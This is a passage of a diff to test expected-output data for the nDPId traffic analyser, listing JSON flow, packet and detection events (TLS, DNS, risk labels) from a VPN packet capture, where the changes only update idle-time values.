{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"e3adec914f3893f18136762f1c0d7d81","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01559{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687260591,"flow_last_seen":1569687260667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1308,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":242,"midstream":0,"thread_ts_msec":1569687260667,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"e3adec914f3893f18136762f1c0d7d81","ja3s":"e54965894d6b45ecb4323c7ea3d6c115","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=813845657003339838, O=Code42, OU=TEST, ST=MN, C=US","subjectDN":"CN=813845657003339838, O=Code42, OU=TEST, ST=MN, C=US","fingerprint":"86:2A:47:EF:00:68:79:60:7F:94:E2:91:6F:E0:38:82:37:8A:8E:2E"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":196,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260751,"flow_last_seen":1569687260751,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1569687260751,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64972,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1569687260751,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1569687260751,"pkt":"LH6BsEqhNDY7z3UoCABFAABXLuMAAP8R6zkKAADjS0tLS\/3MADUAQ49kJ8YBAAABAAAAAAAAAmxiB19kbnMtc2QEX3VkcAEwAzEyOAIyOAMxNzIHaW4tYWRkcgRhcnBhAAAMAAE="} 00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260751,"flow_last_seen":1569687260751,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1569687260751,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64972,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lb._dns-sd._udp.0.128.28.172.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -167,42 +167,42 @@ 00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261485,"flow_last_seen":1569687261501,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1569687261501,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59222,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":1,"num_answers":1,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00584{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1569687261506,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":145,"pkt_l4_len":111,"thread_ts_msec":1569687261506,"pkt":"NDY7z3UoLH6BsEqhCABFAACDAABAADoRnvFLS0tLCgAA4wA13rkAbznpXq+BgwABAAAAAQAADUxQLVJLRVJVUi1PU1gEaHNkMQJjYQdjb21jYXN0A25ldAAAHAABwBoABgABAAAcIAAoBmRuczEwMcAiCGRuc2FkbWluwCIBawJtAAAcIAAADhAACTqAAAAcIA=="} 00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":226,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261486,"flow_last_seen":1569687261506,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1569687261506,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57017,"dst_port":53,"l4_proto":"udp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":1,"num_answers":1,"reply_code":3,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687262866,"flow_last_seen":1569687262866,"flow_idle_time":7440000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":1,"thread_ts_msec":1569687262866,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"162.222.43.153","src_port":56881,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1569687262866,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1569687262866,"pkt":"LH6BsEqhNDY7z3UoCABFAABEAABAAEAGYVoKAADjot4rmd4xAbu3QBvT9S8yS4AYEAD8CwAAAQEIChwNvkTkAuRNDi2ISqeLxJuBXTMcrWivnw=="} 
-00783{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1569687262866,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":292,"pkt_l4_len":258,"thread_ts_msec":1569687262866,"pkt":"LH6BsEqhNDY7z3UoCABFAAEWAABAAEAGYIgKAADjot4rmd4xAbu3QBvj9S8yS4AYEACf4gAAAQEIChwNvkTkAuRNC2FzYPnyOhEIxzv9HgAAAQAAAAAABf0HAAAAAAAAAFYAAAAAABO4pgAAAfJ1AAAAGzdZOcQAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAAEjynVwAAAAAACz6PAAAAAABmQ+JAyo3EgU6LQwAAAAAAAAAAAAAACK7duMsBAQAAAAELYXNg+fI6EQjHO\/0eAAABAAAAAAAF\/QcAAAAAAAAAVgAAAAAAE7imAAAB8nUAAAAbN1k5xAAAAAAAAAAAAAAAAAAAAAAAAAAAbAAAAAASPKdXAAAAAAALPo8AAAAAAAAAAQ=="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1569687262866,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1569687262866,"pkt":"LH6BsEqhNDY7z3UoCABFAABEAABAAEAGYVoKAADjot4rmd4xAbu3QBzF9S8yS4AYEABLrAAAAQEIChwNvkTkAuRNchVP5mraMf5Tgny7zRbHZQ=="} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":298,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267035,"flow_last_seen":1569687267035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687267035,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1569687267035,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687267035,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGwVUKAADjCCVmW95hAbsGNnxMAAAAALAC\/\/9wfAAAAgQFtAEDAwUBAQgKHA3OcQAAAAAEAgAA"} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1569687267077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569687267077,"pkt":"NDY7z3UoLH6BsEqhCABFAAA47VEAAPcGXQsIJWZbCgAA4wG73mHOEwD1BjZ8TZASgABbLAAAAgQFtAEBCAo\/+a5OHA3OcQ=="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1569687267077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267077,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGwWEKAADjCCVmW95hAbsGNnxNzhMA9oAQ\/\/\/yvgAAAQEIChwNzpw\/+a5O"} 
-01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687267035,"flow_last_seen":1569687267079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569687267079,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01205{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":303,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267035,"flow_last_seen":1569687267125,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1569687267125,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": 
{"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}} -01592{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687267035,"flow_last_seen":1569687267203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5944,"flow_avg_l4_payload_len":495,"midstream":0,"thread_ts_msec":1569687267203,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. 
- for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267453,"flow_last_seen":1569687267453,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267453,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56865,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1569687267453,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267453,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAld4hH0glPK3eiXsRe4AREAA75QAAAQEIChwN0AsAIb2q"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267453,"flow_last_seen":1569687267453,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267453,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56866,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1569687267453,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267453,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl94iH3wAQcGNmjQa94AREAAjsAAAAQEIChwN0AsGksZO"} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1569687267454,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267454,"pkt":"NDY7z3UopHczjPFACABFAAA0sX1AAEAGc88KAACVCgAA4x9I3iGJexF7JTyt34ARAPMpJgAAAQEICgAh33UcDdAL"} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1569687267455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267455,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAld4hH0glPK3fiXsRfIAQEAAaFwAAAQEIChwN0A0AId91"} 
+00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687262866,"flow_last_seen":1569687262866,"flow_idle_time":7560000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":1,"thread_ts_msec":1569687262866,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"162.222.43.153","src_port":56881,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1569687262866,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1569687262866,"pkt":"LH6BsEqhNDY7z3UoCABFAABEAABAAEAGYVoKAADjot4rmd4xAbu3QBvT9S8yS4AYEAD8CwAAAQEIChwNvkTkAuRNDi2ISqeLxJuBXTMcrWivnw=="} +00783{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1569687262866,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":292,"pkt_l4_len":258,"thread_ts_msec":1569687262866,"pkt":"LH6BsEqhNDY7z3UoCABFAAEWAABAAEAGYIgKAADjot4rmd4xAbu3QBvj9S8yS4AYEACf4gAAAQEIChwNvkTkAuRNC2FzYPnyOhEIxzv9HgAAAQAAAAAABf0HAAAAAAAAAFYAAAAAABO4pgAAAfJ1AAAAGzdZOcQAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAAEjynVwAAAAAACz6PAAAAAABmQ+JAyo3EgU6LQwAAAAAAAAAAAAAACK7duMsBAQAAAAELYXNg+fI6EQjHO\/0eAAABAAAAAAAF\/QcAAAAAAAAAVgAAAAAAE7imAAAB8nUAAAAbN1k5xAAAAAAAAAAAAAAAAAAAAAAAAAAAbAAAAAASPKdXAAAAAAALPo8AAAAAAAAAAQ=="} 
+00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1569687262866,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1569687262866,"pkt":"LH6BsEqhNDY7z3UoCABFAABEAABAAEAGYVoKAADjot4rmd4xAbu3QBzF9S8yS4AYEABLrAAAAQEIChwNvkTkAuRNchVP5mraMf5Tgny7zRbHZQ=="} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":298,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267035,"flow_last_seen":1569687267035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687267035,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1569687267035,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687267035,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGwVUKAADjCCVmW95hAbsGNnxMAAAAALAC\/\/9wfAAAAgQFtAEDAwUBAQgKHA3OcQAAAAAEAgAA"} 
+00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1569687267077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569687267077,"pkt":"NDY7z3UoLH6BsEqhCABFAAA47VEAAPcGXQsIJWZbCgAA4wG73mHOEwD1BjZ8TZASgABbLAAAAgQFtAEBCAo\/+a5OHA3OcQ=="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1569687267077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267077,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGwWEKAADjCCVmW95hAbsGNnxNzhMA9oAQ\/\/\/yvgAAAQEIChwNzpw\/+a5O"} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687267035,"flow_last_seen":1569687267079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569687267079,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01205{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":303,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267035,"flow_last_seen":1569687267125,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1569687267125,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}} +01592{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687267035,"flow_last_seen":1569687267203,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5944,"flow_avg_l4_payload_len":495,"midstream":0,"thread_ts_msec":1569687267203,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS 
Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., 